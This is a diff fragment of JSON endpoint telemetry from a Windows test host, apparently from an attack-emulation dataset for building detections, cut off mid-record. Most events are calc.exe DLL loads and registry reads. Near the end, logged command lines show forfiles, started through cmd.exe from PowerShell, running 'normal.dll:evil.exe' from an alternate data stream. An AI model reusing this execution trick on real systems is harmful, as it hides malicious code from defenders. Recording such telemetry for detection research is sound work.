"{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", + "registry_value": "DelegateFolders", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "urlmon.dll", + "image_path": "C:\\Windows\\System32\\urlmon.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "iertutil.dll", + "image_path": "C:\\Windows\\System32\\iertutil.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\System32\\cryptbase.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "ieframe.dll", + "image_path": "C:\\Windows\\System32\\ieframe.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "netapi32.dll", + "image_path": "C:\\Windows\\System32\\netapi32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021880000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "edputil.dll", + "image_path": "C:\\Windows\\System32\\edputil.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021880000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "secur32.dll", + "image_path": "C:\\Windows\\System32\\secur32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "mlang.dll", + "image_path": "C:\\Windows\\System32\\mlang.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "wininet.dll", + "image_path": "C:\\Windows\\System32\\wininet.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "Windows.UI.AppDefaults.dll", + "image_path": "C:\\Windows\\System32\\Windows.UI.AppDefaults.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022060000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationAssociationToasts", + "registry_value": "ApplicationAssociationToasts", + "timestamp": 131883574022060000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "policymanager.dll", + "image_path": "C:\\Windows\\System32\\policymanager.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022060000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp110_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022060000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022060000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "twinui.dll", + "image_path": "C:\\Windows\\System32\\twinui.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022150000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022150000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022150000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "twinui.appcore.dll", + "image_path": "C:\\Windows\\System32\\twinui.appcore.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022180000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "CoreUIComponents.dll", + "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022180000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022180000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022180000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883574022330000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574022330000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883574022330000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574022330000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883574022420000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574022420000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredLaunchWindowingMode", + "registry_value": "PreferredLaunchWindowingMode", + "timestamp": 131883574022420000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883574022600000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574022600000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883574022600000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574022600000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "image_load", + "image_name": "MrmCoreR.dll", + "image_path": "C:\\Windows\\System32\\MrmCoreR.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022780000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "BCP47mrm.dll", + "image_path": "C:\\Windows\\System32\\BCP47mrm.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022780000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "Windows.UI.dll", + "image_path": "C:\\Windows\\System32\\Windows.UI.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022860000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "TextInputFramework.dll", + "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022860000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "InputHost.dll", + "image_path": "C:\\Windows\\System32\\InputHost.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022860000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883574022860000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883574022860000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "process", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "subtype": "terminate", + "timestamp": 131883574022950000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883574023050000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883574023050000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883574023050000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "process", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "subtype": "terminate", + "timestamp": 131883574023050000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883574023050000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState\\Mode", + "registry_value": "Mode", + "timestamp": 131883574023050000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "process", + "pid": 5004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574023130000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"forfiles /p c:\\windows\\system32 /m notepad.exe /c \" c:\\folder\\normal.dll:evil.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6296, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883574023260000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574023250000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574023300000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574023300000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574023300000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574023300000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" + }, + { + "command_line": "forfiles /p c:\\windows\\system32 /m notepad.exe /c c:\\folder\\normal.dll:evil.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 524, + "ppid": 6296, + "process_name": "forfiles.exe", + "process_path": 